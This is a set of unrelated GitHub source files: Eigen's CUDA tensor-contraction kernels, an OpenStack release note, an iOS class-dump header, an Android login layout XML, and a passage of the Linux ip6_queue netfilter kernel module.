if (lhs_vert + 2 < m_size)
output(lhs_vert + 2, horiz_base + i) = results[i].z;
if (lhs_vert + 3 < m_size)
output(lhs_vert + 3, horiz_base + i) = results[i].w;
}
}
}
}
template<typename Index, typename LhsMapper,
typename RhsMapper, typename OutputMapper>
__global__ void
__launch_bounds__(256)
EigenFloatContractionKernel(const LhsMapper lhs, const RhsMapper rhs,
const OutputMapper output,
const Index m_size, const Index n_size, const Index k_size) {
__shared__ float2 lhs_shmem[64*32];
__shared__ float2 rhs_shmem[128*8];
typedef float2 LHS_MEM[64][32];
typedef float2 RHS_MEM[128][8];
typedef float2 LHS_MEM16x16[32][16];
typedef float2 RHS_MEM16x16[64][8];
const Index m_block_idx = blockIdx.x;
const Index n_block_idx = blockIdx.y;
const Index base_m = 128 * m_block_idx;
const Index base_n = 64 * n_block_idx;
bool check_rhs = (base_n + 63) >= n_size;
bool check_lhs128 = (base_m + 127) >= m_size;
if (!check_rhs) {
if (!check_lhs128) {
// >= 128 rows left
EigenFloatContractionKernelInternal<Index, LhsMapper, RhsMapper, OutputMapper, false, false>(
lhs, rhs, output, *((LHS_MEM *) lhs_shmem), *((RHS_MEM *) rhs_shmem), m_size, n_size, k_size, base_m, base_n);
} else {
EigenFloatContractionKernelInternal<Index, LhsMapper, RhsMapper, OutputMapper, true, false>(
lhs, rhs, output, *((LHS_MEM *) lhs_shmem), *((RHS_MEM *) rhs_shmem), m_size, n_size, k_size, base_m, base_n);
}
} else {
if (!check_lhs128) {
// >= 128 rows left
EigenFloatContractionKernelInternal<Index, LhsMapper, RhsMapper, OutputMapper, false, true>(
lhs, rhs, output, *((LHS_MEM *) lhs_shmem), *((RHS_MEM *) rhs_shmem), m_size, n_size, k_size, base_m, base_n);
} else {
EigenFloatContractionKernelInternal<Index, LhsMapper, RhsMapper, OutputMapper, true, true>(
lhs, rhs, output, *((LHS_MEM *) lhs_shmem), *((RHS_MEM *) rhs_shmem), m_size, n_size, k_size, base_m, base_n);
}
}
}
template<typename Index, typename LhsMapper,
typename RhsMapper, typename OutputMapper>
__global__ void
__launch_bounds__(256)
EigenFloatContractionKernel16x16(const LhsMapper lhs, const RhsMapper rhs,
const OutputMapper output,
const Index m_size, const Index n_size, const Index k_size) {
__shared__ float2 lhs_shmem[32][16];
__shared__ float2 rhs_shmem[64][8];
const Index m_block_idx = blockIdx.x;
const Index n_block_idx = blockIdx.y;
const Index base_m = 64 * m_block_idx;
const Index base_n = 64 * n_block_idx;
if (base_m + 63 < m_size) {
if (base_n + 63 < n_size) {
EigenFloatContractionKernelInternal16x16<Index, LhsMapper, RhsMapper, OutputMapper, false, false>(lhs, rhs, output, lhs_shmem, rhs_shmem, m_size, n_size, k_size, base_m, base_n);
} else {
EigenFloatContractionKernelInternal16x16<Index, LhsMapper, RhsMapper, OutputMapper, false, true>(lhs, rhs, output, lhs_shmem, rhs_shmem, m_size, n_size, k_size, base_m, base_n);
}
} else {
if (base_n + 63 < n_size) {
EigenFloatContractionKernelInternal16x16<Index, LhsMapper, RhsMapper, OutputMapper, true, false>(lhs, rhs, output, lhs_shmem, rhs_shmem, m_size, n_size, k_size, base_m, base_n);
} else {
EigenFloatContractionKernelInternal16x16<Index, LhsMapper, RhsMapper, OutputMapper, true, true>(lhs, rhs, output, lhs_shmem, rhs_shmem, m_size, n_size, k_size, base_m, base_n);
}
}
}
template<typename Indices, typename LeftArgType, typename RightArgType>
struct TensorEvaluator<const TensorContractionOp<Indices, LeftArgType, RightArgType>, GpuDevice> :
public TensorContractionEvaluatorBase<TensorEvaluator<const TensorContractionOp<Indices, LeftArgType, RightArgType>, GpuDevice> > {
typedef GpuDevice Device;
typedef TensorEvaluator<const TensorContractionOp<Indices, LeftArgType, RightArgType>, Device> Self;
typedef TensorContractionEvaluatorBase<Self> Base;
typedef TensorContractionOp<Indices, LeftArgType, RightArgType> XprType;
typedef typename internal::remove_const<typename XprType::Scalar>::type Scalar;
typedef typename XprType::Index Index;
typedef typename XprType::CoeffReturnType CoeffReturnType;
typedef typename PacketType<CoeffReturnType, GpuDevice>::type PacketReturnType;
enum {
Layout = TensorEvaluator<LeftArgType, Device>::Layout,
};
// Most of the code is assuming that both input tensors are ColMajor. If the
// inputs are RowMajor, we will "cheat" by swapping the LHS and RHS:
// If we want to compute A * B = C, where A is LHS and B is RHS, the code
// will pretend B is LHS and A is RHS.
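// (Editorial note: this works because a row-major matrix reinterpreted as
// column-major is its transpose, and C = A*B implies C^T = B^T * A^T; the
// swapped, column-major computation therefore produces C^T, which is exactly
// C in the caller's row-major layout.)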
typedef typename internal::conditional<
static_cast<int>(Layout) == static_cast<int>(ColMajor), LeftArgType, RightArgType>::type EvalLeftArgType;
typedef typename internal::conditional<
static_cast<int>(Layout) == static_cast<int>(ColMajor), RightArgType, LeftArgType>::type EvalRightArgType;
static const int LDims =
internal::array_size<typename TensorEvaluator<EvalLeftArgType, Device>::Dimensions>::value;
static const int RDims =
internal::array_size<typename TensorEvaluator<EvalRightArgType, Device>::Dimensions>::value;
static const int ContractDims = internal::array_size<Indices>::value;
typedef array<Index, LDims> left_dim_mapper_t;
typedef array<Index, RDims> right_dim_mapper_t;
typedef array<Index, ContractDims> contract_t;
typedef array<Index, LDims - ContractDims> left_nocontract_t;
typedef array<Index, RDims - ContractDims> right_nocontract_t;
static const int NumDims = LDims + RDims - 2 * ContractDims;
typedef DSizes<Index, NumDims> Dimensions;
// typedefs needed in evalTo
typedef typename internal::remove_const<typename EvalLeftArgType::Scalar>::type LhsScalar;
typedef typename internal::remove_const<typename EvalRightArgType::Scalar>::type RhsScalar;
typedef TensorEvaluator<EvalLeftArgType, Device> LeftEvaluator;
typedef TensorEvaluator<EvalRightArgType, Device> RightEvaluator;
typedef typename LeftEvaluator::Dimensions LeftDimensions;
typedef typename RightEvaluator::Dimensions RightDimensions;
EIGEN_DEVICE_FUNC TensorEvaluator(const XprType& op, const Device& device) :
Base(op, device) {}
// We need to redefine this method to make nvcc happy
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE bool evalSubExprsIfNeeded(Scalar* data) {
this->m_leftImpl.evalSubExprsIfNeeded(NULL);
this->m_rightImpl.evalSubExprsIfNeeded(NULL);
if (data) {
evalTo(data);
return false;
} else {
this->m_result = static_cast<Scalar *>(this->m_device.allocate(this->dimensions().TotalSize() * sizeof(Scalar)));
evalTo(this->m_result);
return true;
}
}
void evalTo(Scalar* buffer) const {
if (this->m_lhs_inner_dim_contiguous) {
if (this->m_rhs_inner_dim_contiguous) {
if (this->m_rhs_inner_dim_reordered) {
evalTyped<true, true, true, Unaligned>(buffer);
}
else {
evalTyped<true, true, false, Unaligned>(buffer);
}
}
else {
if (this->m_rhs_inner_dim_reordered) {
evalTyped<true, false, true, Unaligned>(buffer);
}
else {
evalTyped<true, false, false, Unaligned>(buffer);
}
}
}
else {
if (this->m_rhs_inner_dim_contiguous) {
if (this->m_rhs_inner_dim_reordered) {
evalTyped<false, true, true, Unaligned>(buffer);
}
else {
evalTyped<false, true, false, Unaligned>(buffer);
}
}
else {
if (this->m_rhs_inner_dim_reordered) {
evalTyped<false, false, true, Unaligned>(buffer);
}
else {
evalTyped<false, false, false, Unaligned>(buffer);
}
}
}
}
template <typename LhsScalar, typename RhsScalar, typename Index, typename LhsMapper, typename RhsMapper, typename OutputMapper> struct LaunchKernels {
static void Run(const LhsMapper& lhs, const RhsMapper& rhs, const OutputMapper& output, Index m, Index n, Index k, const GpuDevice& device) {
const Index m_blocks = (m + 63) / 64;
const Index n_blocks = (n + 63) / 64;
const dim3 num_blocks(m_blocks, n_blocks, 1);
const dim3 block_size(8, 8, 8);
LAUNCH_CUDA_KERNEL((EigenContractionKernel<Scalar, Index, LhsMapper, RhsMapper, OutputMapper>), num_blocks, block_size, 0, device, lhs, rhs, output, m, n, k);
}
};
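// Editorial note: the float specialization below chooses between two
// geometries: for small problems (m or n < 768) the 16x16-thread kernel on
// 64x64 output tiles, otherwise the 8x32-thread kernel on 128x64 tiles. The
// generic path above always launches the 8x8x8-thread EigenContractionKernel
// on 64x64 tiles.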
template <typename Index, typename LhsMapper, typename RhsMapper, typename OutputMapper> struct LaunchKernels<float, float, Index, LhsMapper, RhsMapper, OutputMapper> {
static void Run(const LhsMapper& lhs, const RhsMapper& rhs, const OutputMapper& output, Index m, Index n, Index k, const GpuDevice& device) {
if (m < 768 || n < 768) {
const Index m_blocks = (m + 63) / 64;
const Index n_blocks = (n + 63) / 64;
const dim3 num_blocks(m_blocks, n_blocks, 1);
const dim3 block_size(16, 16, 1);
LAUNCH_CUDA_KERNEL((EigenFloatContractionKernel16x16<Index, LhsMapper, RhsMapper, OutputMapper>), num_blocks, block_size, 0, device, lhs, rhs, output, m, n, k);
} else {
const Index m_blocks = (m + 127) / 128;
const Index n_blocks = (n + 63) / 64;
const dim3 num_blocks(m_blocks, n_blocks, 1);
const dim3 block_size(8, 32, 1);
LAUNCH_CUDA_KERNEL((EigenFloatContractionKernel<Index, LhsMapper, RhsMapper, OutputMapper>), num_blocks, block_size, 0, device, lhs, rhs, output, m, n, k);
}
}
};
template <bool lhs_inner_dim_contiguous, bool rhs_inner_dim_contiguous, bool rhs_inner_dim_reordered, int Alignment>
void evalTyped(Scalar* buffer) const {
// columns in left side, rows in right side
const Index k = this->m_k_size;
EIGEN_UNUSED_VARIABLE(k)
// rows in left side
const Index m = this->m_i_size;
// columns in right side
const Index n = this->m_j_size;
// zero out the result buffer (which must be of size at least m * n * sizeof(Scalar))
this->m_device.memset(buffer, 0, m * n * sizeof(Scalar));
typedef internal::TensorContractionInputMapper<LhsScalar, Index, internal::Lhs,
LeftEvaluator, left_nocontract_t,
contract_t, 4,
lhs_inner_dim_contiguous,
false, Unaligned> LhsMapper;
typedef internal::TensorContractionInputMapper<RhsScalar, Index, internal::Rhs,
RightEvaluator, right_nocontract_t,
contract_t, 4,
rhs_inner_dim_contiguous,
rhs_inner_dim_reordered, Unaligned> RhsMapper;
typedef internal::blas_data_mapper<Scalar, Index, ColMajor> OutputMapper;
// initialize data mappers
LhsMapper lhs(this->m_leftImpl, this->m_left_nocontract_strides, this->m_i_strides,
this->m_left_contracting_strides, this->m_k_strides);
RhsMapper rhs(this->m_rightImpl, this->m_right_nocontract_strides, this->m_j_strides,
this->m_right_contracting_strides, this->m_k_strides);
OutputMapper output(buffer, m);
setCudaSharedMemConfig(cudaSharedMemBankSizeEightByte);
LaunchKernels<LhsScalar, RhsScalar, Index, LhsMapper, RhsMapper, OutputMapper>::Run(lhs, rhs, output, m, n, k, this->m_device);
}
};
} // end namespace Eigen
#endif // EIGEN_USE_GPU and __CUDACC__
#endif // EIGEN_CXX11_TENSOR_TENSOR_CONTRACTION_CUDA_H
| {
"pile_set_name": "Github"
} |
---
features:
- |
Add support for system-scope to ``role`` commands. This includes the ability to
generate system-scoped tokens using ``system_scope: all`` in ``clouds.yaml``
or ``OS_SYSTEM_SCOPE=all`` as an environment variable. Support is also
included for managing role assignments on the system using ``--system``
when adding and removing roles.
[`bp system-scope <https://blueprints.launchpad.net/keystone/+spec/system-scope>`_]
| {
"pile_set_name": "Github"
} |
//
// Generated by class-dump 3.5 (64 bit) (Debug version compiled Oct 15 2018 10:31:50).
//
// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2015 by Steve Nygard.
//
#import <objc/NSObject.h>
#import <CoreTelephony/NSCopying-Protocol.h>
#import <CoreTelephony/NSSecureCoding-Protocol.h>
@class NSArray;
@interface CTMobileEquipmentInfoList : NSObject <NSCopying, NSSecureCoding>
{
NSArray *_meInfoList;
}
+ (BOOL)supportsSecureCoding;
- (void).cxx_destruct;
@property(retain, nonatomic) NSArray *meInfoList; // @synthesize meInfoList=_meInfoList;
- (id)initWithCoder:(id)arg1;
- (void)encodeWithCoder:(id)arg1;
- (id)copyWithZone:(struct _NSZone *)arg1;
- (id)description;
@end
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
android:layout_width="fill_parent"
android:layout_height="fill_parent"
android:background="@color/kg_common_background"
android:focusableInTouchMode="true"
android:orientation="vertical" >
<include
layout="@layout/kg_common_title_bar" />
<ScrollView
android:id="@+id/kg_layout_scrollview"
android:layout_width="fill_parent"
android:layout_height="fill_parent"
android:layout_weight="1" >
<LinearLayout
android:id="@+id/kg_layout_userlogin"
android:layout_width="fill_parent"
android:layout_height="wrap_content"
android:layout_gravity="center"
android:background="@color/kg_common_background"
android:gravity="center"
android:orientation="vertical"
android:paddingBottom="20dp"
android:paddingTop="20dp" >
<LinearLayout
android:layout_width="300dp"
android:layout_height="wrap_content"
android:background="@drawable/kg_sp_bg"
android:gravity="center_vertical"
android:orientation="horizontal"
android:padding="5dp" >
<ImageView
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:layout_gravity="center_vertical"
android:padding="5dp"
android:scaleType="fitXY"
android:src="@drawable/kg_login_account_photo" />
<EditText
android:id="@+id/kg_login_username"
android:layout_width="0dp"
android:layout_height="35dp"
android:layout_weight="1"
android:background="@null"
android:hint="@string/kg_username"
android:maxLength="64"
android:paddingLeft="5dp"
android:singleLine="true"
android:textColor="@android:color/black"
android:textColorHint="@color/kg_common_hint_color"
android:textSize="16sp" >
</EditText>
<ImageView
android:id="@+id/kg_account_select"
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:paddingRight="15dp"
android:src="@drawable/kg_account_select" />
</LinearLayout>
<LinearLayout
android:layout_width="300dp"
android:layout_height="wrap_content"
android:background="@drawable/kg_sp_bg"
android:gravity="center_vertical"
android:layout_marginTop="10dp"
android:orientation="horizontal"
android:padding="5dp" >
<ImageView
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:layout_gravity="center_vertical"
android:padding="5dp"
android:scaleType="fitXY"
android:src="@drawable/kg_login_password_photo" />
<EditText
android:id="@+id/kg_login_password"
android:layout_width="0dp"
android:layout_height="35dip"
android:layout_weight="1"
android:background="@null"
android:hint="@string/kg_password_text"
android:maxLength="64"
android:paddingLeft="5dp"
android:paddingRight="30dip"
android:password="true"
android:singleLine="true"
android:textColor="@android:color/black"
android:textColorHint="@color/kg_common_hint_color"
android:textSize="16sp" />
<TextView
android:id="@+id/kg_login_forgot_password"
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:paddingRight="10dp"
android:text="@string/kg_forget_password"
android:textColor="@color/kg_common_gray_more_lighter"
android:textSize="16sp" />
</LinearLayout>
<TextView
android:id="@+id/kg_login_wrong_tips"
android:layout_width="300dp"
android:layout_height="wrap_content"
android:paddingBottom="5dp"
android:paddingTop="5dp"
android:textColor="@color/kg_common_red"
android:visibility="invisible" />
<LinearLayout
android:layout_width="300dp"
android:layout_height="wrap_content"
android:orientation="vertical" >
<Button
android:id="@+id/kg_start_login_button"
android:layout_width="300dip"
android:layout_height="@dimen/kg_btn_height"
android:background="@drawable/kg_selector_btn_blue"
android:shadowColor="#ff000fff"
android:text="@string/kg_login"
android:textColor="#ffffffff"
android:textSize="16sp" />
<Button
android:id="@+id/kg_start_reg_imdi_button"
android:layout_width="300dip"
android:layout_height="@dimen/kg_btn_height"
android:layout_marginTop="15dip"
android:background="@drawable/kg_selector_btn_green"
android:shadowColor="#ff000fff"
android:text="@string/kg_one_second_register"
android:textColor="#ffffffff"
android:textSize="16sp" />
</LinearLayout>
</LinearLayout>
</ScrollView>
<com.kugou.game.sdk.ui.widget.LoadingView
android:id="@+id/kg_loading"
android:layout_width="fill_parent"
android:layout_height="fill_parent"
android:layout_gravity="center"
android:layout_weight="1"
android:background="@color/kg_common_background"
android:gravity="center"
android:orientation="vertical"
android:visibility="gone" />
</LinearLayout> | {
"pile_set_name": "Github"
} |
/*
* This is a module which is used for queueing IPv6 packets and
* communicating with userspace via netlink.
*
* (C) 2001 Fernando Anton, this code is GPL.
* IPv64 Project - Work based in IPv64 draft by Arturo Azcorra.
* Universidad Carlos III de Madrid - Leganes (Madrid) - Spain
* Universidad Politecnica de Alcala de Henares - Alcala de H. (Madrid) - Spain
* email: [email protected]
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*/
#include <linux/module.h>
#include <linux/skbuff.h>
#include <linux/init.h>
#include <linux/ipv6.h>
#include <linux/notifier.h>
#include <linux/netdevice.h>
#include <linux/netfilter.h>
#include <linux/netlink.h>
#include <linux/spinlock.h>
#include <linux/sysctl.h>
#include <linux/proc_fs.h>
#include <linux/seq_file.h>
#include <linux/mutex.h>
#include <linux/slab.h>
#include <net/net_namespace.h>
#include <net/sock.h>
#include <net/ipv6.h>
#include <net/ip6_route.h>
#include <net/netfilter/nf_queue.h>
#include <linux/netfilter_ipv4/ip_queue.h>
#include <linux/netfilter_ipv4/ip_tables.h>
#include <linux/netfilter_ipv6/ip6_tables.h>
#define IPQ_QMAX_DEFAULT 1024
#define IPQ_PROC_FS_NAME "ip6_queue"
#define NET_IPQ_QMAX_NAME "ip6_queue_maxlen"
typedef int (*ipq_cmpfn)(struct nf_queue_entry *, unsigned long);
static unsigned char copy_mode __read_mostly = IPQ_COPY_NONE;
static unsigned int queue_maxlen __read_mostly = IPQ_QMAX_DEFAULT;
static DEFINE_SPINLOCK(queue_lock);
static int peer_pid __read_mostly;
static unsigned int copy_range __read_mostly;
static unsigned int queue_total;
static unsigned int queue_dropped = 0;
static unsigned int queue_user_dropped = 0;
static struct sock *ipqnl __read_mostly;
static LIST_HEAD(queue_list);
static DEFINE_MUTEX(ipqnl_mutex);
static inline void
__ipq_enqueue_entry(struct nf_queue_entry *entry)
{
list_add_tail(&entry->list, &queue_list);
queue_total++;
}
static inline int
__ipq_set_mode(unsigned char mode, unsigned int range)
{
int status = 0;
switch(mode) {
case IPQ_COPY_NONE:
case IPQ_COPY_META:
copy_mode = mode;
copy_range = 0;
break;
case IPQ_COPY_PACKET:
if (range > 0xFFFF)
range = 0xFFFF;
copy_range = range;
copy_mode = mode;
break;
default:
status = -EINVAL;
}
return status;
}
static void __ipq_flush(ipq_cmpfn cmpfn, unsigned long data);
static inline void
__ipq_reset(void)
{
peer_pid = 0;
net_disable_timestamp();
__ipq_set_mode(IPQ_COPY_NONE, 0);
__ipq_flush(NULL, 0);
}
static struct nf_queue_entry *
ipq_find_dequeue_entry(unsigned long id)
{
struct nf_queue_entry *entry = NULL, *i;
spin_lock_bh(&queue_lock);
list_for_each_entry(i, &queue_list, list) {
if ((unsigned long)i == id) {
entry = i;
break;
}
}
if (entry) {
list_del(&entry->list);
queue_total--;
}
spin_unlock_bh(&queue_lock);
return entry;
}
static void
__ipq_flush(ipq_cmpfn cmpfn, unsigned long data)
{
struct nf_queue_entry *entry, *next;
list_for_each_entry_safe(entry, next, &queue_list, list) {
if (!cmpfn || cmpfn(entry, data)) {
list_del(&entry->list);
queue_total--;
nf_reinject(entry, NF_DROP);
}
}
}
static void
ipq_flush(ipq_cmpfn cmpfn, unsigned long data)
{
spin_lock_bh(&queue_lock);
__ipq_flush(cmpfn, data);
spin_unlock_bh(&queue_lock);
}
static struct sk_buff *
ipq_build_packet_message(struct nf_queue_entry *entry, int *errp)
{
sk_buff_data_t old_tail;
size_t size = 0;
size_t data_len = 0;
struct sk_buff *skb;
struct ipq_packet_msg *pmsg;
struct nlmsghdr *nlh;
struct timeval tv;
switch (ACCESS_ONCE(copy_mode)) {
case IPQ_COPY_META:
case IPQ_COPY_NONE:
size = NLMSG_SPACE(sizeof(*pmsg));
break;
case IPQ_COPY_PACKET:
if (entry->skb->ip_summed == CHECKSUM_PARTIAL &&
(*errp = skb_checksum_help(entry->skb)))
return NULL;
data_len = ACCESS_ONCE(copy_range);
if (data_len == 0 || data_len > entry->skb->len)
data_len = entry->skb->len;
size = NLMSG_SPACE(sizeof(*pmsg) + data_len);
break;
default:
*errp = -EINVAL;
return NULL;
}
skb = alloc_skb(size, GFP_ATOMIC);
if (!skb)
goto nlmsg_failure;
old_tail = skb->tail;
nlh = NLMSG_PUT(skb, 0, 0, IPQM_PACKET, size - sizeof(*nlh));
pmsg = NLMSG_DATA(nlh);
memset(pmsg, 0, sizeof(*pmsg));
pmsg->packet_id = (unsigned long )entry;
pmsg->data_len = data_len;
tv = ktime_to_timeval(entry->skb->tstamp);
pmsg->timestamp_sec = tv.tv_sec;
pmsg->timestamp_usec = tv.tv_usec;
pmsg->mark = entry->skb->mark;
pmsg->hook = entry->hook;
pmsg->hw_protocol = entry->skb->protocol;
if (entry->indev)
strcpy(pmsg->indev_name, entry->indev->name);
else
pmsg->indev_name[0] = '\0';
if (entry->outdev)
strcpy(pmsg->outdev_name, entry->outdev->name);
else
pmsg->outdev_name[0] = '\0';
if (entry->indev && entry->skb->dev &&
entry->skb->mac_header != entry->skb->network_header) {
pmsg->hw_type = entry->skb->dev->type;
pmsg->hw_addrlen = dev_parse_header(entry->skb, pmsg->hw_addr);
}
if (data_len)
if (skb_copy_bits(entry->skb, 0, pmsg->payload, data_len))
BUG();
nlh->nlmsg_len = skb->tail - old_tail;
return skb;
nlmsg_failure:
kfree_skb(skb);
*errp = -EINVAL;
printk(KERN_ERR "ip6_queue: error creating packet message\n");
return NULL;
}
static int
ipq_enqueue_packet(struct nf_queue_entry *entry, unsigned int queuenum)
{
int status = -EINVAL;
struct sk_buff *nskb;
if (copy_mode == IPQ_COPY_NONE)
return -EAGAIN;
nskb = ipq_build_packet_message(entry, &status);
if (nskb == NULL)
return status;
spin_lock_bh(&queue_lock);
if (!peer_pid)
goto err_out_free_nskb;
if (queue_total >= queue_maxlen) {
queue_dropped++;
status = -ENOSPC;
if (net_ratelimit())
printk(KERN_WARNING "ip6_queue: full at %d entries, "
"dropping packet(s). Dropped: %d\n", queue_total,
queue_dropped);
goto err_out_free_nskb;
}
/* netlink_unicast will either free the nskb or attach it to a socket */
status = netlink_unicast(ipqnl, nskb, peer_pid, MSG_DONTWAIT);
if (status < 0) {
queue_user_dropped++;
goto err_out_unlock;
}
__ipq_enqueue_entry(entry);
spin_unlock_bh(&queue_lock);
return status;
err_out_free_nskb:
kfree_skb(nskb);
err_out_unlock:
spin_unlock_bh(&queue_lock);
return status;
}
static int
ipq_mangle_ipv6(ipq_verdict_msg_t *v, struct nf_queue_entry *e)
{
int diff;
struct ipv6hdr *user_iph = (struct ipv6hdr *)v->payload;
struct sk_buff *nskb;
if (v->data_len < sizeof(*user_iph))
return 0;
diff = v->data_len - e->skb->len;
if (diff < 0) {
if (pskb_trim(e->skb, v->data_len))
return -ENOMEM;
} else if (diff > 0) {
if (v->data_len > 0xFFFF)
return -EINVAL;
if (diff > skb_tailroom(e->skb)) {
nskb = skb_copy_expand(e->skb, skb_headroom(e->skb),
diff, GFP_ATOMIC);
if (!nskb) {
printk(KERN_WARNING "ip6_queue: OOM "
"in mangle, dropping packet\n");
return -ENOMEM;
}
kfree_skb(e->skb);
e->skb = nskb;
}
skb_put(e->skb, diff);
}
if (!skb_make_writable(e->skb, v->data_len))
return -ENOMEM;
skb_copy_to_linear_data(e->skb, v->payload, v->data_len);
e->skb->ip_summed = CHECKSUM_NONE;
return 0;
}
static int
ipq_set_verdict(struct ipq_verdict_msg *vmsg, unsigned int len)
{
struct nf_queue_entry *entry;
if (vmsg->value > NF_MAX_VERDICT || vmsg->value == NF_STOLEN)
return -EINVAL;
entry = ipq_find_dequeue_entry(vmsg->id);
if (entry == NULL)
return -ENOENT;
else {
int verdict = vmsg->value;
if (vmsg->data_len && vmsg->data_len == len)
if (ipq_mangle_ipv6(vmsg, entry) < 0)
verdict = NF_DROP;
nf_reinject(entry, verdict);
return 0;
}
}
static int
ipq_set_mode(unsigned char mode, unsigned int range)
{
int status;
spin_lock_bh(&queue_lock);
status = __ipq_set_mode(mode, range);
spin_unlock_bh(&queue_lock);
return status;
}
static int
ipq_receive_peer(struct ipq_peer_msg *pmsg,
unsigned char type, unsigned int len)
{
int status = 0;
if (len < sizeof(*pmsg))
return -EINVAL;
switch (type) {
case IPQM_MODE:
status = ipq_set_mode(pmsg->msg.mode.value,
pmsg->msg.mode.range);
break;
case IPQM_VERDICT:
status = ipq_set_verdict(&pmsg->msg.verdict,
len - sizeof(*pmsg));
break;
default:
status = -EINVAL;
}
return status;
}
static int
dev_cmp(struct nf_queue_entry *entry, unsigned long ifindex)
{
if (entry->indev)
if (entry->indev->ifindex == ifindex)
return 1;
if (entry->outdev)
if (entry->outdev->ifindex == ifindex)
return 1;
#ifdef CONFIG_BRIDGE_NETFILTER
if (entry->skb->nf_bridge) {
if (entry->skb->nf_bridge->physindev &&
entry->skb->nf_bridge->physindev->ifindex == ifindex)
return 1;
if (entry->skb->nf_bridge->physoutdev &&
entry->skb->nf_bridge->physoutdev->ifindex == ifindex)
return 1;
}
#endif
return 0;
}
static void
ipq_dev_drop(int ifindex)
{
ipq_flush(dev_cmp, ifindex);
}
#define RCV_SKB_FAIL(err) do { netlink_ack(skb, nlh, (err)); return; } while (0)
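/* Sends a netlink ACK carrying the given error code back to the peer and
* aborts processing of the current message. */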
static inline void
__ipq_rcv_skb(struct sk_buff *skb)
{
int status, type, pid, flags;
unsigned int nlmsglen, skblen;
struct nlmsghdr *nlh;
bool enable_timestamp = false;
skblen = skb->len;
if (skblen < sizeof(*nlh))
return;
nlh = nlmsg_hdr(skb);
nlmsglen = nlh->nlmsg_len;
if (nlmsglen < sizeof(*nlh) || skblen < nlmsglen)
return;
pid = nlh->nlmsg_pid;
flags = nlh->nlmsg_flags;
if(pid <= 0 || !(flags & NLM_F_REQUEST) || flags & NLM_F_MULTI)
RCV_SKB_FAIL(-EINVAL);
if (flags & MSG_TRUNC)
RCV_SKB_FAIL(-ECOMM);
type = nlh->nlmsg_type;
if (type < NLMSG_NOOP || type >= IPQM_MAX)
RCV_SKB_FAIL(-EINVAL);
if (type <= IPQM_BASE)
return;
if (!capable(CAP_NET_ADMIN))
RCV_SKB_FAIL(-EPERM);
spin_lock_bh(&queue_lock);
if (peer_pid) {
if (peer_pid != pid) {
spin_unlock_bh(&queue_lock);
RCV_SKB_FAIL(-EBUSY);
}
} else {
enable_timestamp = true;
peer_pid = pid;
}
spin_unlock_bh(&queue_lock);
if (enable_timestamp)
net_enable_timestamp();
status = ipq_receive_peer(NLMSG_DATA(nlh), type,
nlmsglen - NLMSG_LENGTH(0));
if (status < 0)
RCV_SKB_FAIL(status);
if (flags & NLM_F_ACK)
netlink_ack(skb, nlh, 0);
}
static void
ipq_rcv_skb(struct sk_buff *skb)
{
mutex_lock(&ipqnl_mutex);
__ipq_rcv_skb(skb);
mutex_unlock(&ipqnl_mutex);
}
static int
ipq_rcv_dev_event(struct notifier_block *this,
unsigned long event, void *ptr)
{
struct net_device *dev = ptr;
if (!net_eq(dev_net(dev), &init_net))
return NOTIFY_DONE;
/* Drop any packets associated with the downed device */
if (event == NETDEV_DOWN)
ipq_dev_drop(dev->ifindex);
return NOTIFY_DONE;
}
static struct notifier_block ipq_dev_notifier = {
.notifier_call = ipq_rcv_dev_event,
};
static int
ipq_rcv_nl_event(struct notifier_block *this,
unsigned long event, void *ptr)
{
struct netlink_notify *n = ptr;
if (event == NETLINK_URELEASE && n->protocol == NETLINK_IP6_FW) {
spin_lock_bh(&queue_lock);
if ((net_eq(n->net, &init_net)) && (n->pid == peer_pid))
__ipq_reset();
spin_unlock_bh(&queue_lock);
}
return NOTIFY_DONE;
}
static struct notifier_block ipq_nl_notifier = {
.notifier_call = ipq_rcv_nl_event,
};
#ifdef CONFIG_SYSCTL
static struct ctl_table_header *ipq_sysctl_header;
static ctl_table ipq_table[] = {
{
.procname = NET_IPQ_QMAX_NAME,
.data = &queue_maxlen,
.maxlen = sizeof(queue_maxlen),
.mode = 0644,
.proc_handler = proc_dointvec
},
{ }
};
#endif
#ifdef CONFIG_PROC_FS
static int ip6_queue_show(struct seq_file *m, void *v)
{
spin_lock_bh(&queue_lock);
seq_printf(m,
"Peer PID : %d\n"
"Copy mode : %hu\n"
"Copy range : %u\n"
"Queue length : %u\n"
"Queue max. length : %u\n"
"Queue dropped : %u\n"
"Netfilter dropped : %u\n",
peer_pid,
copy_mode,
copy_range,
queue_total,
queue_maxlen,
queue_dropped,
queue_user_dropped);
spin_unlock_bh(&queue_lock);
return 0;
}
static int ip6_queue_open(struct inode *inode, struct file *file)
{
return single_open(file, ip6_queue_show, NULL);
}
static const struct file_operations ip6_queue_proc_fops = {
.open = ip6_queue_open,
.read = seq_read,
.llseek = seq_lseek,
.release = single_release,
.owner = THIS_MODULE,
};
#endif
static const struct nf_queue_handler nfqh = {
.name = "ip6_queue",
.outfn = &ipq_enqueue_packet,
};
static int __init ip6_queue_init(void)
{
int status = -ENOMEM;
struct proc_dir_entry *proc __maybe_unused;
netlink_register_notifier(&ipq_nl_notifier);
ipqnl = netlink_kernel_create(&init_net, NETLINK_IP6_FW, 0,
ipq_rcv_skb, NULL, THIS_MODULE);
if (ipqnl == NULL) {
printk(KERN_ERR "ip6_queue: failed to create netlink socket\n");
goto cleanup_netlink_notifier;
}
#ifdef CONFIG_PROC_FS
proc = proc_create(IPQ_PROC_FS_NAME, 0, init_net.proc_net,
&ip6_queue_proc_fops);
if (!proc) {
printk(KERN_ERR "ip6_queue: failed to create proc entry\n");
goto cleanup_ipqnl;
}
#endif
register_netdevice_notifier(&ipq_dev_notifier);
#ifdef CONFIG_SYSCTL
ipq_sysctl_header = register_sysctl_paths(net_ipv6_ctl_path, ipq_table);
#endif
status = nf_register_queue_handler(NFPROTO_IPV6, &nfqh);
if (status < 0) {
printk(KERN_ERR "ip6_queue: failed to register queue handler\n");
goto cleanup_sysctl;
}
return status;
cleanup_sysctl:
#ifdef CONFIG_SYSCTL
unregister_sysctl_table(ipq_sysctl_header);
#endif
